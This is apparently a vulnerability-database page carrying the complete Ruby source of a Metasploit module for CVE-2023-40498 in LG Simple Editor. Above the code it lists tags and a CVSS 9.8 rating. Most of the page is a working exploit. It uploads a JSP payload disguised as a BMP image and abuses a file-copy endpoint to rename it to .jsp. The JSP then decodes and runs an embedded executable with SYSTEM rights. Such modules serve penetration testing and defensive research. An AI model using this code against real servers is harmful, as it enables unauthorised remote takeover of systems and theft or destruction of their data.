Lucene search

Metasploit1337DAY-ID-39056

HistorySep 11, 2023 - 12:00 a.m.

LG Simple Editor Remote Code Execution Exploit

2023-09-1100:00:00

metasploit

0day.today

123

metasploit

exploit

remote

code execution

broken access control

directory traversal

vulnerabilities

jsp payload

system user permissions

lg simple editor

version 3.21

cve

zdi

windows

upload

filedropper

autocheck

http client

stability

reliability

sideeffects

rank excellent

rapid7

msf_license

author

2023-08-24

platform

arch

disclosuredate

rport

targeturi

check

generate_jsp_payload

copy_file

send_request_cgi

send_request_raw

res

update_info

register_options

normalize_uri

peer

exploit

checkcode

unknown

appears

safe

rex

option

optstring

opt

commonreleasenotes

version

generate_payload_exe

generate_payload

encode_base64

rand_text_alpha

text

decodebuffer

createtempfile

getabsolutepath

bufferedoutputstream

get_html_document

xpath

response

read

metasploit-framework

vulnerability

session

httpclient.

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.7

Confidence

Low

EPSS

0.001

Percentile

45.7%

JSON

This Metasploit module exploits broken access control and directory traversal vulnerabilities in LG Simple Editor software for gaining code execution. The vulnerabilities exist in versions of LG Simple Editor prior to v3.21. By exploiting this flaw, an attacker can upload and execute a malicious JSP payload with the SYSTEM user permissions.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper # includes register_files_for_cleanup
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LG Simple Editor Remote Code Execution',
        'Description' => %q{
          This Metasploit module exploits broken access control and directory traversal
          vulnerabilities in LG Simple Editor software for gaining code execution.
          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.
          By exploiting this flaw, an attacker can upload and execute a malicious JSP
          payload with the SYSTEM user permissions.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'rgod', # Vulnerability discovery
          'Ege Balcı <[email protected]>' # msf module
        ],
        'References' => [
          ['ZDI', '23-1204'],
          ['CVE', '2023-40498']
        ],
        'DefaultOptions' => {
          'WfsDelay' => 5
        },
        'Platform' => %w[win],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          ['LG Simple Editor <= v3.21', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-08-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')
      }
    )

    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?

    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))
    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'
    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')

    Exploit::CheckCode::Safe
  end

  def generate_jsp_payload
    exe = generate_payload_exe
    base64_exe = Rex::Text.encode_base64(exe)
    payload_name = rand_text_alpha(rand(3..8))

    var_raw = 'a' + rand_text_alpha(rand(3..10))
    var_ostream = 'b' + rand_text_alpha(rand(3..10))
    var_buf = 'c' + rand_text_alpha(rand(3..10))
    var_decoder = 'd' + rand_text_alpha(rand(3..10))
    var_tmp = 'e' + rand_text_alpha(rand(3..10))
    var_path = 'f' + rand_text_alpha(rand(3..10))
    var_proc2 = 'e' + rand_text_alpha(rand(3..10))

    jsp = %|
    <%@page import="java.io.*" %>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
    } catch (Exception e) {
    }
    %>
    |

    jsp.gsub!(/[\n\t\r]/, '')

    jsp
  end

  def copy_file(src, dst)
    data = {
      command: 'cp',
      option: '-f',
      srcPath: src,
      destPath: dst
    }
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',
                               'makeDetailContent.do'),
        'headers' => {
          'X-Requested-With' => 'XMLHttpRequest',
          'Accept' => 'application/json'
        },
        'ctype' => 'application/json',
        'data' => data.to_json
      }
    )
    if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')
      print_good "#{src} -> #{dst} copy successfull."
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")
    end
  end

  def exploit
    rand_name = Rex::Text.rand_text_alpha(5)
    form = Rex::MIME::Message.new
    form.add_part(
      generate_jsp_payload,
      'image/bmp',
      'binary',
      "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""
    )
    form.add_part('/', nil, nil, 'form-data; name="uploadPath"')
    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')
    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')
    form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')
    form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')

    print_status 'Uploading JSP payload...'
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),
        'ctype' => "multipart/form-data; boundary=#{form.bound}",
        'data' => form.to_s
      }
    )
    if res && res.code == 200
      print_good 'Payload uploaded successfully'
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")
    end

    # Now we copy our payload as JSP
    copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")
    register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")

    print_status 'Triggering payload...'
    send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")
      }
    )
  end
end